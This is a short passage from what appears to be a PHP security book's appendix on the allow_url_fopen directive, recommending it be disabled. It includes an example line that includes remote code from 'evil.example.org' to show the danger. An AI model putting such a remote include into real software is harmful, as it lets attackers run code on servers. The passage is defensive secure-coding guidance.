A.1. allow_url_fopenAs illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they are local files: <?php $contents = file_get_contents('http://example.org/xss.html'); ?> Chapter 5 reveals how dangerous this is when combined with the use of include or require: <?php include 'http://evil.example.org/evil.inc'; ?> I recommend disabling allow_url_fopen unless your application requires it. |